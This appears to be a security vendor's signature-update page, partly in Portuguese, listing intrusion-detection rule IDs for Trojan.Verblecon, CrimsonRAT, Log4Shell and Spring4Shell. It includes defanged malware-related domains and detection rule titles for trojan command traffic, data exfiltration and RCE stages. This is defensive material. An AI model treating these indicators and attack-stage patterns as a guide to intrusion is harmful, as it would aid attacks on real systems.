Sid 2035664 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (.verble .rocks)

Sid 2035665 TROJAN Observed Trojan.Verblecon Related Domain (.verble .rocks in TLS SNI)

Sid 2035666 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (verble .software)

Sid 2035667 TROJAN Observed Trojan.Verblecon Related Domain (verble .software in TLS SNI)

CrimsonRAT

O CrimsonRAT é um trojan de acesso remoto, que foi encontrado em e-mails de spearphishing com documentos mal-intencionados do Microsoft Office.

Assinaturas geradas pela Blockbit

Sid 2035598 TROJAN Win32/CrimsonRAT Variant Sending Command (inbound)

Sid 2035599 TROJAN Win32/CrimsonRAT Variant Sending Command M2 (inbound)

Sid 2035600 TROJAN Win32/CrimsonRAT Variant Sending System Information (outbound)

Log4Shell

Considerado o maior zero day da última década, o Log4Shell é uma vulnerabilidade detectada na biblioteca de código aberto Apache Log4j.

Assinaturas geradas pela Blockbit

DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com)

VMWare vSphere log4shell exploit attempt

Sid 2034820

Sid 58811

Sid 58812

Sid 58813

CVE-2021-44228

CVE-2021-44832

CVE-2021-45046

CVE-2021-45105

SpringCore

Considerado como o novo Log4j, o Spring4Shell é uma vulnerabilidade que afeta o SpringCore, uma estrutura amplamente usada em aplicativos Java.

Assinaturas geradas pela Blockbit

Sid 2035670 Possible Spring Cloud Connector RCE Inbound (CVE-2022-22963)

Sid 2035674 Possible SpringCore RCE/Spring4Shell Stage 1 Pattern Set Inbound (Unassigned)

Sid 2035675 Possible SpringCore RCE/Spring4Shell Stage 2 Suffix Set Inbound (Unassigned)

Sid 2035676 Possible SpringCore RCE/Spring4Shell Stage 3 Directory Set Inbound (Unassigned)

Sid 2035677 Possible SpringCore RCE/Spring4Shell Stage 4 Prefix Set Inbound (Unassigned)

Sid 2035678 Possible SpringCore RCE/Spring4Shell Inbound (Unassigned)